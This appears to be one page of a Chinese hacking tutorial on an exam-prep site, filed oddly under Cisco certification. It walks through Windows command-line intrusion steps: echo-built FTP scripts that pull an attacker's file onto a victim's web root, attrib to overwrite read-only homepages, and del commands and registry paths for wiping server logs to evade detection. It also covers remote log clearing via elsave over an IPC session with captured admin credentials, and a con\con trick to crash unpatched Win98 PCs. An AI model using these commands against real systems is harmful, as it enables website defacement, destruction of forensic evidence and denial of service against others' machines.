首页 考试吧论坛 Exam8视线 考试商城 网络课程 模拟考试 考友录 实用文档 求职招聘 论文下载
2011中考 | 2011高考 | 2012考研 | 考研培训 | 在职研 | 自学考试 | 成人高考 | 法律硕士 | MBA考试
MPA考试 | 中科院
四六级 | 职称英语 | 商务英语 | 公共英语 | 托福 | 雅思 | 专四专八 | 口译笔译 | 博思 | GRE GMAT
新概念英语 | 成人英语三级 | 申硕英语 | 攻硕英语 | 职称日语 | 日语学习 | 法语 | 德语 | 韩语
计算机等级考试 | 软件水平考试 | 职称计算机 | 微软认证 | 思科认证 | Oracle认证 | Linux认证
华为认证 | Java认证
公务员 | 报关员 | 银行从业资格 | 证券从业资格 | 期货从业资格 | 司法考试 | 法律顾问 | 导游资格
报检员 | 教师资格 | 社会工作者 | 外销员 | 国际商务师 | 跟单员 | 单证员 | 物流师 | 价格鉴证师
人力资源 | 管理咨询师考试 | 秘书资格 | 心理咨询师考试 | 出版专业资格 | 广告师职业水平
驾驶员 | 网络编辑
卫生资格 | 执业医师 | 执业药师 | 执业护士
会计从业资格考试会计证) | 经济师 | 会计职称 | 注册会计师 | 审计师 | 注册税务师
注册资产评估师 | 高级会计师 | ACCA | 统计师 | 精算师 | 理财规划师 | 国际内审师
一级建造师 | 二级建造师 | 造价工程师 | 造价员 | 咨询工程师 | 监理工程师 | 安全工程师
质量工程师 | 物业管理师 | 招标师 | 结构工程师 | 建筑师 | 房地产估价师 | 土地估价师 | 岩土师
设备监理师 | 房地产经纪人 | 投资项目管理师 | 土地登记代理人 | 环境影响评价师 | 环保工程师
城市规划师 | 公路监理师 | 公路造价师 | 安全评价师 | 电气工程师 | 注册测绘师 | 注册计量师
缤纷校园 | 实用文档 | 英语学习 | 作文大全 | 求职招聘 | 论文下载 | 访谈 | 游戏
您现在的位置: 考试吧(Exam8.com) > 思科认证考试 > 学习教程 > 正文

思科认证:入侵命令详解



    这里说明一下,<和>是重定向命令只是一个是输入重定向另一个是输出重定向,比如我们在命令提示符下就会显示c:\>这个意思就是把C盘的命令权重定向给我们,同样:也是定向的命令也叫作管道,它是用来连接两个命令的管道,先执行管道左边的命令,再执行管道右边的命令,不过我是没能耐把DOS命令说明白的,想研究就买本dos大全看吧,够看半年的了。

    -------------------------------------------------------

    大家可以本地试下。

    可能你会问,这样简单黑下有什么好玩的,其实他可以用来下载主页到对方的目录里。

    1、首先,我们需要申请一个免费的主页空间。

    2、用echo在可写目录下建立如下内容的txt文件:(以chinren服务器为例。)

    open upload.chinaren.com(你的FTP服务器,申请时你的空间提供商会给你的)

    cnhack(你申请时的用户名)

    test(你申请时的密码)

    get index.htm c:\inetpub\wwwroot\index.htm(这里是把你空间上的index.htm下载到对方的c:\inetpub\wwwroot\index.htm)

    bye(退出FTP对话,相当在98下的DOS,用EXIT退出DOS)

    ---------------------------------------------

    具体的做法:

    输入 echo open upload.chinaren.com> c:\cnhack.txt

    输入 echo cnhack >> c:\cnhack.txt

    输入 echo 39abs >> c:\cnhack.txt

    输入 echo get index.htm c:\inetpub\wwwroot\index.htm+>>+c:\cnhack.txt

    最后输入 ftp -s:c:\cnhack.txt (利用ftp的-s参数,执行文件里的内容。)

    等命令完成时,文件已经下载到你指定的文件里了。

    -----------------------

    注意:取得文件后,请删除cnhack.txt。(如果不删除,很容易会给别人看到你的密码。)

    记得要 del c:\cnhack.txt

    --------------------------------------------------------------------------------

    11:attrib

    这个命令是设置文件属性的。如果你想黑一个站,而他的主页的文件属性设置了只读,那就很可怜呀,想删除他也不行,想覆盖他也不行。倒!不过有这个命令就别怕了。

    attrib -r index.htm

    这个命令是把index.htm的只读属性去掉。

    如果把“-”改为“+”则是把这个文件的属性设置为只读

    ----------------------

    attrib +r index.htm

    这个命令是把index.htm的属性设置为只读。

    ----------------------------------------

    attrib这个命令先要用来查属性,比如attrib 文件名,这样就显示出这个文件的属性了,它不止有R这个属性,其实一共有四种属性, a 档案属性 r 只读属性 h隐含属性 s系统属性,我们想用哪个就用哪个,我觉得把我们上传的文件加个隐含属性更有意思,,,,,继续挑那贴的错.

    ---------------------------------------------------------------------------------------------------------------------------

    12:del

    当你看到这个标题可别倒下啊!现在要离开127.0.0.1了,要删除日志,当然要删除日志啦!想被捉吗。呵呵。

    NT的日志有这些

    del C:\winnt\system32\logfiles\*.*

    del C:\winnt\ssytem32\config\*.evt

    del C:\winnt\system32\dtclog\*.*

    del C:\winnt\system32\*.log

    del C:\winnt\system32\*.txt

    del C:\winnt\*.txt

    del C:\winnt\*.log

    只要删除这些就可以了。有些系统NT安装在D盘或其他盘,就要把C改成其他盘。

    Internet信息服务FTP日志默认位置:%systemroot%\system32\logfiles\msftpsvc1\,默认每天一个日志

    Internet信息服务WWW日志默认位置:%systemroot%\system32\logfiles\w3svc1\,默认每天一个日志

    Scheduler服务日志默认位置:%systemroot%\schedlgu.txt

    以上日志在注册表里的键:

    应用程序日志,安全日志,系统日志,DNS服务器日志,它们这些LOG文件在注册表中的:

    HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Eventlog

    有的管理员很可能将这些日志重定位。其中EVENTLOG下面有很多的子表,里面可查到以上日志的定位目录。

    Schedluler服务日志在注册表中

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent

    --------------------------------------------------------------------

    del确实是删除文件用的,log也确实是日志文件类型,不过按上面这种方法是不可能清理掉你自身的日志的,因为系统自动运行着日志记录,你在做这些时它一直都在记录着,并没有停止,大家也会常看到,有时删除某个文件时会提示系统正在占用拒绝删除的,呵呵,这就明白了,系统正在运行的东西已经驻留内存里,当然不能这样删除掉了,大家怕了吧,这样删等于帮别人清理了日志,没删自己那份啊,哈哈哈哈,要问我怎么清理,我只说大家还是用小榕的工具来清吧,那个又快又好,我们何必去用那些烦琐的命令行呢,尤其对生长在windows桌面操作下的人们那显然是太麻烦了,我推荐小榕的elsave工具,清理日志又快又干净,还省电呢,嘻嘻,我可不是做广告来的。

    -------------------------------------------------------------------------

    借助第三方工具:如小榕的elsave.exe远程清除system,applicaton,security的软件,

    使用方法很简单,首先利用获得的管理员账号与对方建立ipc会话,net use \\ip pass /us

    er: user

    然后命令行下:elsave -s \\ip -l application -C,这样就删除了安全日志。

    其实利用这个软件还可以进行备份日志,只要加一个参数 -f filename就可以了,在此不再详述。

    --------------------------------------------------------------------------------局域网要别人死机? 他C盘开了共享的话(win98,而且没有打补丁),你在DOS下输入

    \\他的IP或机器名\c\con\con

    --------------------------------------------------------------------------------

上一页  1 2 3 4 5 6  下一页
文章搜索
思科认证考试栏目导航
版权声明:如果思科认证考试网所转载内容不慎侵犯了您的权益,请与我们联系800@exam8.com,我们将会及时处理。如转载本思科认证考试网内容,请注明出处。